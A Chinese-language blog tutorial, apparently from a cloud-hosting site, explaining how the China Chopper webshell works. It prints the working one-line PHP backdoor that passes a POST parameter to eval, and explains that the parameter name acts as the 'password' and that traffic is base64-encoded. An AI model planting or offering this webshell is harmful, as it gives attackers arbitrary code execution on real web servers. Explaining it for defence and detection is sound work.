温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

中国菜刀执行过程

发布时间:2020-07-22 09:37:23 来源:网络 阅读:841 作者:serverxx0 栏目:安全技术

 对于玩***的人来说  一句话 中国菜刀 肯定不陌生   那么菜刀到底是怎么样判断他的密码呢? 如何列目录的呢?  我们一一来进行科普下。

 一句话:<?php @eval($_POST[fuck])?>

这是php的一句话密码。不懂的人来说  这怎么样是***呢? 这明明是正常的php语法。别着急,慢慢讲解。

上面的一句话是服务端 也就是说  他等待post提交变量名fuck的数据  

现在是逆向思维 我们先用正向思维去看



<form action="a.php" method="post">

name: <input type="text" name="fuck" />

<input type="submit" />

</form>
www.a.com/a.php

Welcome <?php echo $_POST["fuck"]; ?>.<br />


这个代码 你们肯定都熟悉  post提交变量名为fuck的数据给a.php  之后输出


那菜刀就是你先把接受端上传到服务器  之后我们自己提交数据给接收端

例:<?php @eval($_POST[fuck])?>

那么提交的时候肯定是post提交数据 之后执行的相应的代码,比如说列目录?写文件?等等 fuck=.......代码   接收端接受到之后eval执行  执行之后会出现相应值。那么菜刀再去读取。


至于密码这里 我这样解释了 相信大家也看的清楚了 为何还有密码这个说法。 因为接收端的fuck,你输入123的变量去提交 接受端不认识123变量是什么 那里来的,所以就无法执行。


菜刀通讯加密使用base64

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI